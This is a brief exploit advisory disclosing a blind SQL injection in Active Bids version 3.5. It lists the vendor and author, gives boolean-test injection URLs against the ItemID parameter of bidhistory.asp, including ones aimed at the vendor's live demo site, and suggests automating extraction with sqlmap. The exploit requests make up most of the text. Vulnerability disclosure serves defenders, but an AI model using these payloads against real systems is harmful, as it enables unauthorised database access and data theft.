Active Bids version 3.5 suffers from a blind SQL injection vulnerability.
2aac3dc70589a2c2834cb1d87290f360bad44ac4148bb225b10a116f47cc50f5
[~]Tybe : Remote Blind SQL Injection Vulnerability
[~]Vendor : www.activewebsoftwares.com
[~]Software : Active Bids
[~]author : Mountassif Moad
http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1
http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0
Demo :
http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1
http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0
# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...